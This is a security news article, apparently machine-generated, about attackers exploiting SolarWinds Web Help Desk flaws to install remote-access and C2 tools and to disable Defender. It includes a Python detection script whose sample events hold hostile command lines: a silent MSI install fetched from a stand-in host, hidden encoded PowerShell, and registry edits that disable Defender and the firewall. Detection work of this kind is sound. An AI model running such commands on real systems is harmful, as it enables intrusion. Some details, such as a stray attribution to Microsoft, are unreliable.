

Ethical Hacking News

Hackers Lure Organizations into a Web of Deceit: The SolarWinds WHD Flaw and its Far-Reaching Consequences



Hackers are exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to deploy legitimate tools for malicious purposes. The attack leverages the recently disclosed CVE-2025-40551 and CVE-2025-26399 flaws, with threat actors using the Zoho ManageEngine Assist agent and Velociraptor as part of their campaign. This report delves into the details of this attack chain and its implications for system administrators, including how to mitigate the impact of these vulnerabilities.

  • Hackers are exploiting vulnerabilities in SolarWinds Web Help Desk (WHD) solution to deploy malicious tools.
  • The attackers used recently disclosed flaws in WHD, including CVE-2025-40551 and CVE-2025-26399, to gain remote code execution on host machines without authentication.
  • The attack chain involves using a malicious MSI file to install the Zoho ManageEngine Assist agent and Velociraptor command-and-control framework.
  • The threat actors also use Cloudflared as a secondary tunnel-based access channel and disable Windows Defender and Firewall via registry modifications.
  • System administrators are advised to upgrade SolarWinds WHD to version 2026.1 or later, remove public internet access to admin interfaces, and reset all credentials associated with the product.



SolarWinds, whose Web Help Desk (WHD) solution is widely used in the IT industry, has become the focal point of a malicious campaign that has left organizations reeling. According to recent reports by Huntress Security, hackers are exploiting vulnerabilities in SolarWinds WHD to deploy legitimate tools for nefarious purposes, including the Zoho ManageEngine remote monitoring and management tool. This article delves into the details of this attack chain and its implications for system administrators.

The attackers, believed to be part of a campaign that started on January 16, leveraged the recently disclosed SolarWinds WHD flaws, specifically CVE-2025-40551 and CVE-2025-26399, which received critical severity ratings from CISA. These vulnerabilities enable threat actors to achieve remote code execution on host machines without authentication.

The attack chain begins with an initial access phase: once the attacker has a foothold on the system, a malicious MSI file is fetched from the Catbox file-hosting platform. The tool it installs is then configured for unattended access and registered to a Zoho Assist account tied to an anonymous Proton Mail address.

Once inside, the attacker installs the Zoho ManageEngine Assist agent via the aforementioned MSI file, which is used for direct hands-on-keyboard activity and Active Directory (AD) reconnaissance. Moreover, Velociraptor, a legitimate digital forensics and incident response tool, is deployed as a command-and-control framework that communicates with the attackers via Cloudflare Workers. In this case the outdated Velociraptor version 0.73.4 was used, which contains a privilege escalation flaw that allows permissions on the host to be increased.

The threat actor also leverages Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. In some instances, persistence is achieved via a scheduled task (TPMProfiler) that opens an SSH backdoor via QEMU.

Furthermore, the attackers disable Windows Defender and Firewall via registry modifications so that the download of additional payloads is not blocked. The threat actor proceeds by downloading a fresh copy of VS Code approximately a second after disabling Defender.

The attack highlights the potential for sophisticated actors to exploit known vulnerabilities and abuse legitimate tools to achieve their objectives. System administrators are advised to upgrade SolarWinds WHD to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.

Huntress also shared Sigma rules and indicators of compromise to help detect Zoho Assist, Velociraptor, Cloudflared, and VS Code tunnel activity, silent MSI installations, and encoded PowerShell execution.
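As an added example (not Huntress's Sigma rules and not code from the article), the following Python scans constructed Windows process-creation and registry events for several of the behaviours listed above: a silent MSI install pulled straight from a URL, encoded PowerShell, cloudflared and VS Code tunnels, a Velociraptor client, and the Defender and firewall policy values being switched off. The event schema, the sample command lines and the hypothetical hostname are assumptions; the registry value names are the standard Windows policy values rather than ones the article names, and the Zoho Assist install stage is covered only indirectly through the silent-MSI rule.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Simplified telemetry record (assumed schema, not a real product's format)."""
    kind: str            # "process" or "registry"
    image: str = ""      # full path of the created process
    cmdline: str = ""    # its command line
    key: str = ""        # registry key path for registry-set events
    value: str = ""      # registry value name
    data: str = ""       # registry value data, as a string


def _base(image: str) -> str:
    """Lower-cased file name of an image path, tolerating either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# /i or /package pointing directly at an http(s) URL, plus a quiet switch.
_URL_INSTALL = re.compile(r"(?i)(?:/|-)(?:i|package)\s+\"?https?://")
_QUIET = re.compile(r"(?i)(?:^|\s)(?:/|-)(?:qn|qb|quiet|q)(?=\s|$)")
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
_ENCODED = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
# Windows Defender policy values that switch protection off when set to 1.
_DEFENDER_OFF = {"disableantispyware", "disablerealtimemonitoring"}


def classify(ev: Event) -> list[str]:
    """Return the detection tags that fire for a single event."""
    tags = []
    if ev.kind == "process":
        b, c = _base(ev.image), ev.cmdline
        if b == "msiexec.exe" and _URL_INSTALL.search(c) and _QUIET.search(c):
            tags.append("silent_msi_from_url")
        if b in ("powershell.exe", "pwsh.exe") and _ENCODED.search(c):
            tags.append("encoded_powershell")
        if b == "cloudflared.exe" or ("cloudflared" in c.lower() and "tunnel" in c.lower()):
            tags.append("cloudflared_tunnel")
        if "velociraptor" in b:
            tags.append("velociraptor_client")
        if b in ("code.exe", "code") and re.search(r"(?i)\btunnel\b", c):
            tags.append("vscode_tunnel")
    elif ev.kind == "registry":
        k, v = ev.key.lower(), ev.value.lower()
        if "\\policies\\microsoft\\windows defender" in k and v in _DEFENDER_OFF and ev.data.strip() == "1":
            tags.append("defender_disabled_by_policy")
        if "firewallpolicy" in k and v == "enablefirewall" and ev.data.strip() == "0":
            tags.append("firewall_disabled")
    return tags


def scan(events):
    """Scan events in order and return (event index, tag) pairs for every detection."""
    return [(i, t) for i, ev in enumerate(events) for t in classify(ev)]


# Constructed sample telemetry; the host name and paths are invented for the example.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\msiexec.exe",
          "msiexec.exe /i https://files.example.invalid/agent.msi /qn"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -enc RwBlAHQALQBEAGEAdABlAA=="),  # "Get-Date" in UTF-16LE base64
    Event("registry", key=r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender",
          value="DisableAntiSpyware", data="1"),
    Event("registry", key=r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile",
          value="EnableFirewall", data="0"),
    Event("process", r"C:\ProgramData\cf\cloudflared.exe", "cloudflared.exe tunnel run --token <placeholder-token>"),
    Event("process", r"C:\ProgramData\vr\velociraptor.exe", "velociraptor.exe --config client.config.yaml client"),
    Event("process", r"C:\Users\Public\code\code.exe", "code.exe tunnel --accept-server-license-terms"),
    # Benign control: an ordinary interactive install of a local MSI should not fire.
    Event("process", r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Temp\vendor.msi"),
]

if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {tag}")
```

Each rule answers one line of the Huntress summary, so a hit maps directly to a stage of the described chain. In production these conditions would sit on Sysmon process-creation and registry-set events (or the equivalent EDR telemetry), and the MSI and PowerShell rules in particular need exclusions for sanctioned software-deployment tooling that legitimately installs quietly from an internal URL.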

Although Microsoft has not attributed the observed attacks to any specific threat group, and nothing has been disclosed about the targets beyond characterizing them as "high-value assets," this attack serves as a stark reminder of the importance of keeping software up to date and being vigilant against potential vulnerabilities in widely used tools.

The future of IT infrastructure is one where manual workflows are increasingly overtaken by automation. However, this does not make security any less important. The recent SolarWinds WHD flaws highlight the need for system administrators to be aware of potential threats and to take proactive measures to protect their systems.

In light of these developments, it has become imperative to implement comprehensive security strategies that cater to the evolving landscape of IT vulnerabilities.



Related Information:
  • https://www.ethicalhackingnews.com/articles/Hackers-Lure-Organizations-into-a-Web-of-Deceit-The-SolarWinds-WHD-Flaw-and-its-Far-Reaching-Consequences-ehn.shtml
  • https://www.bleepingcomputer.com/news/security/threat-actors-exploit-solarwinds-wdh-flaws-to-deploy-velociraptor/
  • https://thehackernews.com/2026/02/solarwinds-web-help-desk-exploited-for.html
  • https://cyberpress.org/exploiting-solarwinds-web-help-desk/
  • https://nvd.nist.gov/vuln/detail/CVE-2025-40551
  • https://www.cvedetails.com/cve/CVE-2025-40551/
  • https://nvd.nist.gov/vuln/detail/CVE-2025-26399
  • https://www.cvedetails.com/cve/CVE-2025-26399/

Published: Mon Feb 9 17:08:34 2026 by llama3.2 3B Q4_K_M

© Ethical Hacking News. All rights reserved.